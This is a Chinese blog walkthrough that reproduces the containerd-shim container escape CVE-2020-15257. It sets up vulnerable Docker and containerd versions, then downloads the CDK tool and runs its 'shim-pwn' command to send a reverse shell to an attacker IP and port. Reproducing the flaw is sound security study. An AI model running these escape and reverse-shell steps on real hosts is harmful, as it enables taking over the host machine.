当前位置：首页 > news >正文

Docker 容器逃逸漏洞 (CVE-2020-15257)复现

news 2026/2/8 8:51:53

漏洞概述

containerd是行业标准的容器运行时，可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中，容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0，但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器（有效UID为0，但特权降低）导致新进程以提升的特权运行。

Containerd是一个控制runC的守护进程，提供命令行客户端和API，用于在一个机器上管理容器。

在版本1.3.9之前和1.4.0~1.4.2的Containerd中，由于在网络模式为host的情况下，容器与宿主机共享一套Network namespace ，此时containerd-shim API暴露给了用户，而且访问控制仅仅验证了连接进程的有效UID为0，但没有限制对抽象Unix域套接字的访问，刚好在默认情况下，容器内部的进程是以root用户启动的。在两者的共同作用下，容器内部的进程就可以像主机中的containerd一样，连接containerd-shim监听的抽象Unix域套接字，调用containerd-shim提供的各种API，从而实现容器逃逸。

影响版本

containerd < 1.4.3``containerd < 1.3.9

环境搭建

1.Ubuntu更换源

vim  /etc/apt/sources.list#将文件内容替换为，这里为了速度快，我用了阿里的源deb http://mirrors.aliyun.com/ubuntu/ xenial main restricted universe multiversedeb http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ xenial-proposed main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ xenial main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-proposed main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted universe multiverse

3.添加官方GPG密钥

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -

4.设置稳定的存储库

add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"

5.查看可安装的docker版本

apt-cache madison docker-ce

6.安装指定版本的docker

apt-get install docker-ce=<Version> docker-ce-cli=<Version> containerd.io=<Version><br>apt-get install docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1

7.下载一个容器

docker pull ubuntu:18.04

8.通过--net=host 作为启动参数来运行并进入一个容器：

docker run -it --net=host ubuntu:18.04 /bin/bash

9.在容器内执行 cat /proc/net/unix|grep -a "containerd-shim" 可看到抽象命名空间Unix域套接字.

10.由于docker没有wget工具，需要在docker里面下载wget

apt-get update
apt-get install wget

11.下载exp并实现反弹shell，实现docker逃逸

wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz
tar -zxvf cdk_v0.1.6_release.tar.gz ./cdk_linux_amd64 run shim-pwn [攻击机ip] [监听端口]./cdk_linux_amd64 run shim-pwn 192.168.1.8 12345

12.攻击机监听1234端口，可看到docker逃逸成功。

Docker 容器逃逸漏洞 (CVE-2020-15257)复现

相关文章：

Docker 容器逃逸漏洞 (CVE-2020-15257)复现

Python 如何使用 csv、openpyxl 库进行读写 Excel 文件详细教程（更新中）

$nextTick属性使用与介绍

【群智能算法改进】一种改进的鹈鹕优化算法 IPOA算法[2]【Matlab代码#58】

k8s 入门到实战--部署应用到 k8s

编程语言新特性：instanceof的改进

数据挖掘的学习路径

逻辑回归Logistic

Flink提交jar出现错误RestHandlerException: No jobs included in application.

【数仓基础（一）】基础概念：数据仓库【用于决策的数据集合】的概念、建立数据仓库的原因与好处

电商类面试问题--01Elasticsearch与Mysql数据同步问题

天线材质介绍--FPC天线

vue3 的 ref、 toRef 、 toRefs

WebRTC中 setup:actpass、active、passive

ModuleNotFoundError: No module named ‘lavis‘解决方案

双指针的问题解法以及常见的leetcode例题。

python容器模块Collections

排序算法学习记录-快速排序

安装windows版本的ros2 humble的时候，最后报错

Nginx 学习（十）高可用中间件的配置与实现

Ubuntu系统下交叉编译openssl

【C语言练习】080. 使用C语言实现简单的数据库操作

【C++从零实现Json-Rpc框架】第六弹 —— 服务端模块划分

如何在最短时间内提升打ctf（web)的水平？

dify打造数据可视化图表

为什么要创建 Vue 实例

Leetcode33（搜索旋转排序数组）

git: early EOF

java+webstock

Spring Boot 与 Kafka 的深度集成实践（二）